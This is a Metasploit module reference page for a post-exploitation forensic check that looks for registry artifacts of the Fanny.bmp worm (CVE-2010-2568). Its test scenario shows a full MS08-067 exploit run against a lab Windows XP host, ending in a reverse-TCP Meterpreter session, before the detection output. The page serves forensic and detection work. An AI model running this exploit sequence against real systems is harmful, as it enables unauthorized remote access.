FannyBMP or DementiaWheel Detection Registry Check - Metasploit


This page contains detailed information about how to use the post/windows/gather/forensics/fanny_bmp_check metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: FannyBMP or DementiaWheel Detection Registry Check
Module: post/windows/gather/forensics/fanny_bmp_check
Source code: modules/post/windows/gather/forensics/fanny_bmp_check.rb
Disclosure date: -
Last modification time: 2021-08-27 17:15:33 +0000
Supported architecture(s): -
Supported platform(s): Windows
Target service / protocol: -
Target network port(s): -
List of CVEs: CVE-2010-2568

This module searches for the Fanny.bmp worm related reg keys. fannybmp is a worm that exploited zero day vulns (more specifically, the LNK Exploit CVE-2010-2568). Which allowed it to spread even if USB Autorun was turned off. This is the same exploit that was used in StuxNet.

Module Ranking and Traits


Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Basic Usage


There are two ways to execute this post module.

From the Meterpreter prompt

The first is by using the "run" command at the Meterpreter prompt. It allows you to run the post module against that specific session:

meterpreter > run post/windows/gather/forensics/fanny_bmp_check

From the msf prompt

The second is by using the "use" command at the msf prompt. You will have to figure out which session ID to set manually. To list all session IDs, you can use the "sessions" command.

msf > use post/windows/gather/forensics/fanny_bmp_check
msf post(fanny_bmp_check) > show options
    ... show and set options ...
msf post(fanny_bmp_check) > set SESSION session-id
msf post(fanny_bmp_check) > exploit

If you wish to run the post against all sessions from framework, here is how:

1 - Create the following resource script:


framework.sessions.each_pair do |sid, session|
  run_single("use post/windows/gather/forensics/fanny_bmp_check")
  run_single("set SESSION #{sid}")
  run_single("run")
end

2 - At the msf prompt, execute the above resource script:

msf > resource path-to-resource-script

Required Options


  • SESSION: The session to run this module on.

Knowledge Base


Vulnerable Application


Fanny or DWE for short. (DWE = DementiaWheel)

Detection module based on the post/windows/gather/forensics/duqu_check module. Fanny is a worm that infects windows machines, via USB (not trough Autorun, or at least not only).

In fact, it used exploits later found in StuxNet. It creates creates some Registry artifacts.

This module is intended to detect those artifacts.

Supported Environments:


  • Windows x86

Supported SessionTypes:


  • Meterpreter
  • Shell

Supported OS's:


  • Windows XP Pro (SP3)

Verification Steps


  • Start msfconsole
  • Open a session on a Windows host (using exploit/windows/smb/ms08_067_netapi for example)
  • Use post/windows/gather/forensics/fanny_bmp_check
  • Set the SESSION datastore option to the target session
  • Run the module

Scenarios


Windows XP SP3

msf6 exploit(windows/smb/ms08_067_netapi) > use exploit/windows/smb/ms08_067_netapi
msf6 exploit(windows/smb/ms08_067_netapi) > set LHOST 192.168.122.1
msf6 exploit(windows/smb/ms08_067_netapi) > set RHOST 192.168.122.160
msf6 exploit(windows/smb/ms08_067_netapi) > set LPORT 4444
msf6 exploit(windows/smb/ms08_067_netapi) > run

[*] Started reverse TCP handler on 192.168.122.1:4444 
[*] 192.168.122.160:445 - Automatically detecting the target...
[*] 192.168.122.160:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 192.168.122.160:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 192.168.122.160:445 - Attempting to trigger the vulnerability...
[*] Sending stage (175174 bytes) to 192.168.122.160
[*] Meterpreter session 4 opened (192.168.122.1:4444 -> 192.168.122.160:1043) at 2020-12-22 16:55:02 +0100

meterpreter > run post/windows/gather/forensics/fanny_bmp_check

[*] Searching the registry for Fanny.bmp artifacts.
[+] WORKSTATION1: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\MediaResources\acm\ECELP4\Driver found in registry.
[+] WORKSTATION1: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\MediaResources\acm\ECELP4\filter2 found in registry.
[+] WORKSTATION1: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\MediaResources\acm\ECELP4\filter3 found in registry.
[+] WORKSTATION1: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\MediaResources\acm\ECELP4\filter8 found in registry.
[*] WORKSTATION1: 4 result(s) found in registry.
meterpreter >

Go back to menu.

Msfconsole Usage


Here is how the windows/gather/forensics/fanny_bmp_check post exploitation module looks in the msfconsole:

msf6 > use post/windows/gather/forensics/fanny_bmp_check

msf6 post(windows/gather/forensics/fanny_bmp_check) > show info

       Name: FannyBMP or DementiaWheel Detection Registry Check
     Module: post/windows/gather/forensics/fanny_bmp_check
   Platform: Windows
       Arch: 
       Rank: Normal

Provided by:
  William M.

Compatible session types:
  Meterpreter
  Shell

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  SESSION                   yes       The session to run this module on.

Description:
  This module searches for the Fanny.bmp worm related reg keys. 
  fannybmp is a worm that exploited zero day vulns (more specifically, 
  the LNK Exploit CVE-2010-2568). Which allowed it to spread even if 
  USB Autorun was turned off. This is the same exploit that was used 
  in StuxNet.

References:
  https://securelist.com/a-fanny-equation-i-am-your-father-stuxnet/68787
  https://nvd.nist.gov/vuln/detail/CVE-2010-2568

Module Options


This is a complete list of options available in the windows/gather/forensics/fanny_bmp_check post exploitation module:

msf6 post(windows/gather/forensics/fanny_bmp_check) > show options

Module options (post/windows/gather/forensics/fanny_bmp_check):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.

Advanced Options


Here is a complete list of advanced options supported by the windows/gather/forensics/fanny_bmp_check post exploitation module:

msf6 post(windows/gather/forensics/fanny_bmp_check) > show advanced

Module advanced options (post/windows/gather/forensics/fanny_bmp_check):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   VERBOSE    false            no        Enable detailed status messages
   WORKSPACE                   no        Specify the workspace for this module

Post Actions


This is a list of all post exploitation actions which the windows/gather/forensics/fanny_bmp_check module can do:

msf6 post(windows/gather/forensics/fanny_bmp_check) > show actions

Post actions:

   Name  Description
   ----  -----------

Evasion Options


Here is the full list of possible evasion options supported by the windows/gather/forensics/fanny_bmp_check post exploitation module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 post(windows/gather/forensics/fanny_bmp_check) > show evasion

Module evasion options:

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Go back to menu.


References


See Also


Check also the following modules related to this module:

Related Nessus plugins:

Authors


  • William M.

Version


This page has been produced using Metasploit Framework version 6.1.27-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.